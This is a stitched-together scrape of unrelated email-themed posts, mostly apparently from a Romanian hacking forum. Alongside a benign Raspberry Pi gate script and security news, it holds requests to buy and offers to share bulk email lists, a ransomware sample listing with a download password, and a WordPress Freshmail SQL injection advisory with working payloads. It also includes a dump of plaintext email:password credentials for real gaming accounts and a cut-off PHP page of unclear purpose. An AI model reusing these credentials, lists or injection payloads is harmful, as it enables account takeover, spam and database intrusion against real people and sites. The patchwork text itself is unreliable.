Search the Community

Background Recently while writing and testing some email related code I got annoyed and decided to make an easier way to automate listening for emails and performing actions when they arrive. The result is websocket.email and to demonstrate how easy it is to use, let's make an email controlled gate opener using a raspberry pi and a tiny shell script. The hardware A gate. A gate opener. A raspberry pi 3 with linux installed. A raspberry pi GPIO 'cobbler' breadboard adapter. A breadboard. An NPN transistor and a 1k resistor. The abridged theory When the button is pressed circuit is powered, opening the gate. Transistors also can be configured to be an electronically controlled switch and we can programmatically control the general purpose input/output pins of a raspberry pi to drive the transistor. This gives us the following circuit: Assembly Replace the gate opener battery with the power supply on the breadboard using a soldering iron and solder, remember to write down which terminal is positive/negative. Replace the button with a transistor (Use a multimeter and google to work out which way it goes.) and resistor using a soldering iron and solder. Connect the gate opener input, power and ground into the bread board and match it up with the labels on the 'cobbler'. Connect 'cobbler' to the raspberry pi and breadboard. voila: The software wsemail compiled for the raspberry pi 3. A free api token generated from websocket.email. Combined with the following bash script running on the raspberry pi 3: #! /bin/sh set -u export WEBSOCKETEMAIL_TOKEN=$(cat websocketemail_token.txt) # A secret id that people can't guess gateid=gate12345 # initialize gpio echo 13 > /sys/class/gpio/export echo out > /sys/class/gpio/gpio13/direction while true do if wsemail -timeout 0 -for-address $gateid@websocket.email \ | grep -q "open sesame" then # Trigger the gate if the email contained the secret incantation echo 1 > /sys/class/gpio/gpio13/value sleep 0.1 echo 0 > /sys/class/gpio/gpio13/value fi # don't loop too fast if there is an error somewhere. sleep 1 done The code can be summarized as: Initialize passwords and GPIO. Loop forever waiting for an email to be sent to gate12345@websocket.email with the contents "open sesame". If the password is correct, pulse the GPIO switch, triggering the gate to open. The code is MIT licensed on github. The result Step aside Amazon IOT, you are doing it wrong. Also, I know my email address is in the video, send me nice comments Conclusion Interacting with the real world using software is a lot of fun and I encourage you to have a try at building something for yourself. These days you do not need to be an expert in electronics to make something that interacts with the physical world. websocket.email also did it's job well, and I hope it can also be useful anywhere you need to interact with email accounts ... perhaps even unit/integration tests at your software job... wink wink. Happy hacking! FAQ What do you mean 20 lines of code... There is go code in there!? 20 lines of shell needed to solve the task at hand, wsemail is reusable, just like your OS kernel, cat and all the other software it also used that you didn't complain about... though you aren't totally wrong. Why you wouldn't you setup an smtp server on the device? Why add websocket crap? NAT makes things annoying if you run the smtp server on the device, but I did setup an smtp server, and made a tiny api for it too :). Feel free to setup your own smtp server and use that instead. Why you wouldn't you use IMAP to poll the server? Which server? which account? Am I retaining emails? Sounds annoying. In my opinion the current configuration is a bit simpler for this use case. Source: acha.ninja

Security researchers are warning of a new, easy-to-exploit email trick that could allow an attacker to turn a seemingly benign email into a malicious one after it has already been delivered to your email inbox. Dubbed Ropemaker (stands for Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky), the trick was uncovered by Francisco Ribeiro, the researcher at email and cloud security firm Mimecast. A successful exploitation of the Ropemaker attack could allow an attacker to remotely modify the content of an email sent by the attacker itself, for example swapping a URL with the malicious one. This can be done even after the email has already been delivered to the recipient and made it through all the necessary spam and security filters, without requiring direct access to the recipient’s computer or email application, exposing hundreds of millions of desktop email client users to malicious attacks. Ropemaker abuses Cascading Style Sheets (CSS) and Hypertext Markup Language (HTML) that are fundamental parts of the way information is presented on the Internet. Since CSS is stored remotely, researchers say an attacker can change the content of an email through remotely initiated changes made to the desired 'style' of the email that is then retrieved remotely and presented to the user, without the recipient, even tech savvy users, knowing about it. According to the researchers, the Ropemaker attack could be leveraged depending upon the creativity of the threat actors. For instance, attackers could replace a URL that originally directed the user to a legitimate website by a malicious one that sends the user to a compromised site designed to infect users with malware or steal sensitive info, such as their credentials and banking details. While some systems are designed to detect the URL switch preventing users from opening up the malicious link, other users could be left at a security risk. Another attack scenario, called "Matrix Exploit" by the Mimecast, is more sophisticated than the "Switch Exploit", and therefore much harder to detect and defend against. In a Matrix Exploit attack, attackers would write a matrix of text in an email and then use the remote CSS to selectively control what is displayed, allowing the attacker to display whatever they want—including adding malicious URLs into the body of the email. This attack is harder to defend against because the initial email received by the user does not display any URL, most software systems will not flag the message as malicious. Although the security firm has not detected the Ropemaker attack in the wild, it believes that this doesn't mean for sure the attack is "not being used somewhere outside the view of Mimecast." According to the security firm, Ropemaker could be used by hackers to bypass most common security systems and trick even the tech savvy users into interacting with a malicious URL. To protect themselves from such attacks, users are recommended to rely on web-based email clients like Gmail, iCloud and Outlook, which aren't affected by Ropemaker-style CSS exploits, according to Mimecast. However, email clients like the desktop and mobile version of Apple Mail, Microsoft Outlook, and Mozilla Thunderbird are all vulnerable to the Ropemaker attack. Via https://thehackernews.com/2017/08/change-email-content.html

Buna, am programat un comment și email grabber in Python, sper sa va placa Aici e link-ul: https://ghostbin.com/paste/k436w Daca ma puteti ajuta cu un invite la un site invite only unde gasesc torenturi va rog sa imi lasati mesaj multumesc

Salut RST! Recent am decis sa fac o pagina de facebook care sa promoveze Romania, destinata romanilor. Cu facebook ads merge cam incet., vin max 50-100 likes pe zi (CPC e in jur $0.05). Vreau sa ii dau un boost si m-am gandit sa ma folosesc de functia ''Email Contact Import'' care imi permite sa adaug cate 5000 de emailuri pe zi. Asadar, daca cineva are o lista fresh cu emailuri romanesti sau chiar un fisier csv cu contacte facebook, contactati-ma. PS: Lista o voi folosi strict pentru pagina de facebook. NU ma intereseaza email spam.

http://www.dat-mar.com/

Salut tuturor, stie cineva un program gen sa poti trimite acelasi mesaj la mai multe persoane de odata? Ca din cate am vazut la yahoo, dupa vreo 2 mesaje cu 70 de persoane iti blocheaza contul.

Salutare! Sunt in cautare de emailuri de buna calitate din Suedia. Daca are cineva sau poate sa imi scoata de undeva ne putem intelege la un pret convenabil. Emailurile le folosesc pentru afliliere la vanzarea unui produs specific acelei zone.

grabbit.py Python script for grabbing email or IP addresses (optional with port) from a given file. Installation Clone the github repo git clone https://github.com/vlad-s/grabbit Usage """ grabbit.py grabs email/ip(:port) strings from a given file """ from __future__ import print_function # pylint needs this for py3k from socket import inet_aton # non regex ip validation from os import access, R_OK # file access validation from sys import stdout # write to stdout if no file specified import re import argparse __author__ = "Vlad <vlad at vlads dot me>" __version__ = "0.1" __license__ = "GPL v3" __description__ = "python script for grabbing email or ip addresses \ (optional with port) from a given file. " PARSER = argparse.ArgumentParser(description=__description__) GROUP = PARSER.add_mutually_exclusive_group() GROUP.add_argument('--email', help='match an email address', action='store_true') GROUP.add_argument('--ip', help='match an ip address', action='store_true') GROUP.add_argument('--ip-port', help='match an ip:port', action='store_true') PARSER.add_argument('-s', '--separator', help='separator used when data is \ column separated using one or more characters') PARSER.add_argument('-w', '--write', help='file to write in (default stdout)') PARSER.add_argument('file', help='the file to look in') ARGS = PARSER.parse_args() if not (ARGS.email or ARGS.ip or ARGS.ip_port): print("You have to select an option.") exit(1) if not access(ARGS.file, R_OK): print("Can't open the file, exiting.") exit(1) if ARGS.write is not None: try: OUT = open(ARGS.write, 'w') except OSError: print("Can't write to file, permission error, exiting.") exit(1) else: OUT = stdout if ARGS.separator is not None: SEP = ARGS.separator.encode('utf-8').decode('unicode_escape') else: SEP = None VALIDMAIL = re.compile(r'^[^@ ]+@[^@]+\.[^@]+$') def is_valid_ip(ip_address): """ Returns the validity of an IP address """ if not re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', ip_address): return False # first we need a valid ip form try: inet_aton(ip_address) # check if it's a valid ip address except OSError: return False return True for line in open(ARGS.file, 'rb'): line = line.strip().split(SEP.encode('utf-8')) if ARGS.email: found = [OUT.write(s.decode('utf-8') + '\n') for i, s in enumerate(line) if VALIDMAIL.match(s.decode('utf-8'))] OUT.flush() else: for string in line: string = string.decode('utf-8') if ARGS.ip_port and len(string.split(':')) == 2: # IP:Port ip, port = string.split(':') if is_valid_ip(ip) and 0 < int(port) < 65535: OUT.write('{}:{}\n'.format(ip, port)) OUT.flush() elif ARGS.ip: if is_valid_ip(string): OUT.write(string + '\n') OUT.flush() Source (w/ shameful advertising): https://github.com/vlad-s/grabbit

Buna! Am tot cautat pe forumuri o solutie pentru a extrage email-uri dintr-un fisier text. Programelul l-am scris in python si am folosit regular expresions (Regex). Reusesc sa extrag doar email-uri care nu contin spatii, dar nu am reusit sa extrag un email de genul: name2 @ email . com Am nevoie de codul care extrage emailul gasit scris atat corect (fara spatii) cat si cu spatii (cum am exemplificat mai sus). Pun mai jos exemplu de fisier text si codul pe care l-am scris: xxx test1@gmail.com xxxx xxxxxxxx xxx test2 @ email . com xxx xxxxxxx xxx name1.name2.mm@email.co.uk xxx xxxxxxxxxxx Codul: import re a = open('emails.txt') for line in a: line = line.rstrip() if re.search(r'[\w.-]+@[\w.-]+',line): z = re.findall(r'[\w.-]+@[\w.-]+',line) print (z[0]) Returneaza doar: test1@gmail.com name1.name2.mm@email.co.uk

GhostMail is a new secure email, chat and storage platform, with features like self-destructing emails and two factor login. It's free with 1GB space. Free Sign Up [en] | GhostMail

Ce pot face sa zicem cu aprox 1k valid pp acc si vreo 10 k email acc . Sa fie totul bine si fara probleme ))

How to get the key First you need to go to the giveaway page Than you enter your email After you enter your email click on send button Than you need to go to your email Find the email that Okayfreedom send to you Get the code and enter it at your okayfreedom software And that’s all you have free 1 year premium https://www.okayfreedom.com/specials/pcadvisor0615/of

Cryptographic ransom. Delivered via email. Smart install maker -> Delphi. In attach dropper and extracted ransom. Installs to %Program Files%, runs via HKLM Run key. Used https://github.com/SnakeDoctor/FGInt Changing desktop wallpaper to it own with ransom message. Wallpaper can be found inside ransom resources. Email: trojanencoder@aol.com Target extensions Autoelevate in loop pExecInfo.cbSize = 60; pExecInfo.hwnd = GetFocus(); pExecInfo.fMask = 1280; pExecInfo.lpVerb = "runas"; pExecInfo.lpFile = (LPCSTR)sub_404E98(); pExecInfo.lpParameters = (LPCSTR)sub_404E98(); pExecInfo.nShow = 1; while ( !ShellExecuteExA(&pExecInfo) ) Sleep_0(0x7D0u); VT https://www.virustotal.com/en/file/add92cb6047f2fb412dcbcb5a2d8ee7fad56091ccd6667105d977b010a33b561/analysis/1433824692/ https://www.virustotal.com/en/file/94f36b586379137a58862ca46cd1cd6c01c20ea9f56755f7b193f0c97b7a57bd/analysis/1433824702/ Derivative of this https://securelist.ru/blog/issledovaniya/24070/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/ ( use google translate ) Download pass: infected Source

A security software firm has warned about a new strain of "ransomware" - while finding that even Russian hackers can be haggled down. Ransomware is software which locks you out of your files until a fee is paid to the criminals behind the attack. Checkpoint researcher Natalia Kolesova detailed information about Troldash, a newly-discovered strain. Once it infects a machine, Troldash provides an email address with which to contact the attackers. "While the most ransom-trojan attackers try to hide themselves and avoid any direct contact," Ms Kolesova explained, "Troldesh's creators provide their victims with an e-mail address. The attackers use this email correspondence to demand a ransom and dictate a payment method." Troldash was distributed via a spam email - and once downloaded, immediately set to work encrypting files before placing a text file of ransom instructions on the target's computer. Posing as a victim named Olga, the researcher contacted the scam artist, and received a reply with instructions to pay 250 euros to get the files back. Suspecting the reply was automated, Ms Kolesova pressed for a more human response, asking more details about how to transfer the money, and pleading with the hacker to not make them pay. Responding in Russian, the scammer offered to accept 12,000 roubles, a discount of around 15%. After Ms Kolesova pleaded further, the email response read: "The best I can do is bargain." Eventually the unknown man or woman was talked into accepting 7,000 roubles - 50% less than the first demand. "Perhaps if I had continued bargaining, I could have gotten an even bigger discount," Ms Kolesova concluded. Ransomware is a particularly vicious problem for many victims around the world. One strain, Cryptolocker, was said to have infected more than 250,000 computers worldwide. Another variant locked users out of their favourite games unless they paid a fee. The company did not pay the ransom - and recommended that up-to-date security software designed to protect against ransomware and other attacks was a better approach. Source

Now No Government Can Spy On Its Citizens! Taking a cue from Google and Apple, Facebook for the first time is giving its users more encryption options to keep their information private, infuriating agencies like FBI and NSA who believe that “law enforcement and national security investigators need to be able to access communications and information to obtain the evidence necessary to prevent crime and bring criminals to justice in a court of law” and that locking user data places lives in danger by limiting government surveillance. The US government who recently said they will stop spying on Americans is up in arms because this new encryption won’t let them spy on Americans. In a blogpost, Facebook explained how the feature will work: “It’s very important to us that the people who use Facebook feel safe and can trust that their connection to Facebook is secure…Whilst Facebook seeks to secure connections to your email provider with TLS, the stored content of those messages may be accessible as plaintext (with attachments) to anyone who accesses your email provider or email account. To enhance the privacy of this email content, today we are gradually rolling out an experimental new feature that enables people to add OpenPGP public keys to their profile; these keys can be used to “end-to-end” encrypt notification emails sent from Facebook to your preferred email accounts. People may also choose to share OpenPGP keys from their profile, with or without enabling encrypted notifications.” Created as PGP (which stands for “pretty good privacy”), nearly 25 years ago by Phil Zimmermann, OpenPGP is one of the most popular available standards for protecting email with public key encryption. You will be able to update your own public key, using a desktop browser, at: https://www.facebook.com/me/about?section=contact-info The new move will allow users to encrypt notifications sent from the social networking website to their email addresses, protecting potentially sensitive emails, such as a request for a new password, from hackers, spies or anybody who does not have the user’s private key. “It also means that people who activate the email encryption and then lose their private key cannot turn to Facebook for help. The social network would have a copy of the public key uploaded to a user’s Facebook profile, but encrypted chats or emails off the site would still require the users’ private key to unlock. Other account recovery methods like SMS and Trusted Contacts can still work without relying upon email recovery,” explains Jay Nancarrow, a communications manager with Facebook. ??????????????The Committee to Protect Journalists has praised Facebook’s encryption decision. “Facebook has taken an important step to help protect users’ private communications by default, and make the risky environment, in which journalists work, a little bit safer,” said CPJ Internet Advocacy Coordinator Geoffrey King.

Buna sper sa nu va deranjez dsar ma puteti ajuta cu o invitatie pe filelist la email nistor.grigo99@yahoo.com Ms sau un cont nu conteaza .

Salut, imi poate scrie cineva send.php pentru: <div id="tooplate_main"> <h4>Contact Form</h4> <form method="post" name="contact" action="#"> <label for="author">Name:</label> <input type="text" id="author" name="author" class="required input_field" /> <div class="cleaner h10"></div> <label for="email">Email:</label> <input type="text" class="validate-email required input_field" name="email" id="email" /> <div class="cleaner h10"></div> <label for="subject">Subject:</label> <input type="text" class="validate-subject required input_field" name="subject" id="subject"/> <div class="cleaner h10"></div> <label for="text">Message:</label> <textarea id="text" name="text" rows="0" cols="0" class="required"></textarea> <div class="cleaner h10"></div> <input type="submit" value="Send" id="submit" name="submit" class="submit_btn float_l" /> <input type="reset" value="Reset" id="reset" name="reset" class="submit_btn float_r" /> </form> </div> </div> cu redirect catre 'mesajtrimis.html' Multumesc

Aveti aici 2 liste de email, IT 248K - UK 177K. ExpireBox

Scammers use phishing emails to get consumers to click on links to websites they've created solely for the purpose of information theft. They trick users into typing their names, addresses, login IDs, passwords or credit card information into fields on sites that look like they belong to real companies. In some cases, just clicking the link provided in an email will automatically drop malware onto the user's device. Once the malware is installed, hackers can easily steal the victim's information without their knowledge. Phishers are getting better and better at making their traps look real, copying logos and creating sham urls and email addresses that look like actual corporate credentials. The Intel quiz displayed 10 real emails delivered to inboxes and collected by analysts at McAfee Labs, which is part of Intel Security. Some were legitimate correspondences from major companies, while others were phishing emails that look extremely believable. Of the 19,458 people who took the quiz, the vast majority -- 80 percent -- fell for at least one of the fake phishing emails they saw. Only 3 percent got a perfect score. Interestingly, the one email that was most often misidentified in the quiz was actually a legitimate letter. It raised false alarm bells by encouraging readers to claim free ads, a clicky turn of phrase that made people wary. Compared to the other 143 countries represented in the survey, the U.S. ranked 27th overall in ability to detect phishing. Americans' average 68 percent accuracy was just a few points above the global average. France, Sweden, Hungary, the Netherlands and Spain turned in the best performances. The results serve as yet another reminder to click with caution -- or not click at all. Intel Security's Gary Davis urged people to keep security software and browsers up to date to help weed out malicious sites and downloads, and to hover over links before clicking on them to make sure they point where they say they do. He also warned of obvious red flags, such as misspellings or bad grammar, that can help tip you off to a fraudulent correspondence. Want to see how you'd do on the quiz? You can try your hand at it above. If you don't score well, don't take it too hard. When Intel circulated an earlier version of it to Internet security professionals last year, 94 percent were fooled at least once. Source

Am gasit un scanner de smtp-uri de linux si m-am gandit sa il postez , nu stiu cum functioneaza am vazut ca ia smtp-uri si din email si din ip .... poate ma lamuriti si pe mine Fastupload.ro - transfer rapid de fi?iere online

Poti sa primesti o licenta pe viata pentru un autoposter profesional daca urmezi pasii de la acest link : Facebook Sharer PRO | Admin Login Totul incepe cu versiunea demo si adresa de email a unui prieten de-al tau ! Trebuie doar s fii foarte activ si vei primi foarte multe bobnusuri atractive ! Succes,

------------------------ ISSUE 1: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> * # Software Link: *https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip <https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>* # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection in located in the attribute "id" of the inserted shortcode [FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query. A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection. 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/shortcode.php, lines 27 and 120: Line 19: function fm_form_func($atts) [...] Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";'); [...] Line 120: add_shortcode('FM_form', 'fm_form_func'); 3. Proof of concept --------------------------- 1. As collaborator, start a new post. 2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b'] 3. Click preview. 4. If the form is shown, the statement is true, if not, false. POST /wp-admin/post.php HTTP/1.1 Host: <web> Content-Length: 3979 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: <web> User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_f305[...] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wpnonce" 0a75a3666b ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="user_ID" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="action" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="originalaction" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_author" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_type" post ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_post_status" pending ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="referredby" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_original_http_referer" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_ID" 69 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="meta-box-order-nonce" f8aa04e508 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="closedpostboxesnonce" ebf65a43ed ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_title" Testing SQLi in shortcode ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="samplepermalinknonce" e753a2d8f2 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="content" [FM_form id='1" and substr(user(),1,1)="b] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="wp-preview" dopreview ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_publish" Submit for Review ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_format" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="tax_input[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="newtag[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="excerpt" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="trackback_url" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyselect" #NONE# ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyinput" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metavalue" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_ajax_nonce-add-meta" 6a13a5a808 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="advanced_view" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="comment_status" open ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="ping_status" open ------WebKitFormBoundary384PE6lRgBcOibkL-- 5. Solution --------------- Update to version 1.6 ------------------------ ISSUE 2: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> # Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter *fm_form_id. * 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 [...] Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func'); [...] Line 44: $result =3D $_POST; [...] Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id=3D"'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept --------------------------- POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <web> X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and "a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id=3D"1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a". 5. Solution --------------- Update to version 1.6 Source

Email: pmcanespie22@gmail.com:oblivion72 Origin ID: abc1334172750 Battlefield: Bad Company™ 2 ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/abc1334172750 Rank: 1 DLC: No DLC ================================ Email: zunwoo.virat@gmail.com:090517673g Origin ID: abc1428819255 Dead Space ================================ Email: feudji@gmail.com:azedc14789 Origin ID: Rapace14 Medal of Honor™ BATTLEFIELD 4 (ORIGIN FREE TRIAL) ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/Rapace14 Rank: 0 DLC: Close Quaters ================================ Email: dpsdag@hotmail.com:daazone Origin ID: abc901362743 SPORE™ ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/abc901362743 Rank: 61 DLC: No DLC ================================ Email: ph.vischer@hotmail.com:ph19vi94 Origin ID: philip228 Battlefield: Bad Company™ 2 Battlefield 3™ Beta ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/philip228 Rank: 47 DLC: ================================ Email: michalkud@gmail.com:nezadane Origin ID: Trinkorn Burnout™ Paradise The Ultimate Box Dead Space™ 3 Command & Conquer™ Red Alert™ 3: Uprising Battlefield 3™ ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/Trinkorn Rank: 3 DLC: No DLC ================================ Email: tetsuo340@hotmail.com:porculero1 Origin ID: Khelton Need for Speed™ Hot Pursuit ================================ Email: suzuki410@hotmail.com:22612712beer Origin ID: JohnnyBear Battlefield: Bad Company™ 2 ================================ Email: enriab93_@hotmail.com:helloween1 Origin ID: Dazedx_X Need for Speed World ================================ Email: danielgon71@hotmail.com:hulala Origin ID: abc1919942572 Medal of Honor™ Limited Edition ================================ Email: nigelbright164@gmail.com:leociaralexi Origin ID: oldgamer12345 Dragon Age™: Origins - Ultimate Edition SimCity 2000™ Special Edition ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/oldgamer12345 Rank: 0 DLC: ================================ Email: eoscondor@gmail.com:r247sk1n Origin ID: wufggjv6 SPORE™ SPORE™ Creepy & Cute Parts Pack Spore Galactic Adventures Alice: Madness Returns™ ================================ Email: ramo-er-hot95@hotmail.com:mehmed2 Origin ID: Mrbosnier FIFA Soccer 11 ================================ Email: vanessajacob727@hotmail.com:caramel Origin ID: Vanesss727 Bejeweled® 3 Dragon Age™: Origins ================================ Email: aurely.alera@gmail.com:bouddha784 Origin ID: Alera784 The Sims™ 3 Generations The Sims™ 3 The Sims™ 3 Late Night Expansion Pack SimCity 4 Deluxe Edition The Sims™ 3 Ambitions The Sims™ 3 World Adventures Expansion Pack The Sims™ 3 Pets ================================ Email: furryrobert@gmail.com:cathunter Origin ID: ArrowUnleashed Battlefield 1942™ ================================ Email: juzu2000@gmail.com:joona123 Origin ID: juszu123 Battlefield 1942™ The Sims™ 3 Teaser ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/juszu123 Rank: 16 DLC: No DLC

APPLE <?php echo "<head> <style type=\"text/css\"><!-- body { background-color: #333333; font-size: 10pt; } body,td,th { color: #cccccc; } h2 { color: #FFCC00; } .business{ color:yellow; } .premier{ color:#00FF00; } .verified{ color:#006DB0; } body {font-family: 'Open Sans', sans-serif; font-size:12px} hr {border: 1px inset #E5E5E5} #form-container { border: 1px solid #ddd; border-radius: 10px; -moz-border-radius: 10px; -webkit-border-radius: 10px; box-shadow: 0px 0px 15px #888; -moz-box-shadow: 0px 0px 15px #888; -webkit-box-shadow: 0px 0px 15px #888; margin: 30px auto; padding: 10px; width: 95%; text-shadow:1px 1px 4px rgba(0,0,0,0.3); } input[type='text'], textarea, select { border: 1px solid #ccc; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; -moz-box-shadow: 0 1px 2px rgba(0, 0, 0, .15) inset; -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, .15) inset; box-shadow: 0 1px 2px rgba(0, 0, 0, .15) inset; color: #424242; font-family: 'Open Sans', sans-serif; font-size: 13px; outline: none; padding: 2px; -moz-transition: border .2s linear, box-shadow .2s linear; -webkit-transition: border .2s linear, -webkit-box-shadow .2s linear; } input[type='text']:focus, input[type='checkbox']:focus, input[type='radio']:focus, textarea:focus, select:focus { border: 1px solid #80bfff; -moz-box-shadow: 0 0 3px #80bfff, 0 1px 2px rgba(0, 0, 0, .15) inset; -webkit-box-shadow: 0 0 3px #80bfff, 0 1px 2px rgba(0, 0, 0, .15) inset; box-shadow: 0 0 3px #80bfff, 0 1px 2px rgba(0, 0, 0, .15) inset; } textarea {width:99.5%; resize:none} input[type=text] {width:30px; text-align:center} /* =buttons---------------------------------------------- */ a.button:link, a.button:visited, button, input[type='submit'] { background: #eaeaea; background: -moz-linear-gradient(top, #efefef, #d8d8d8) #d8d8d8; background: -webkit-gradient(linear, left top, left bottom, from(#efefef), to(#d8d8d8)) #d8d8d8; background: linear-gradient(top, #efefef, #d8d8d8) #d8d8d8; border: 1px solid #ababab; -moz-border-radius: 3px; -webkit-border-radius: 3px; border-radius: 3px; -moz-box-shadow: 0 1px 2px rgba(0, 0, 0, .1), 0 1px 1px rgba(255, 255, 255, .8) inset; -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, .1), 0 1px 1px rgba(255, 255, 255, .8) inset; box-shadow: 0 1px 2px rgba(0, 0, 0, .1), 0 1px 1px rgba(255, 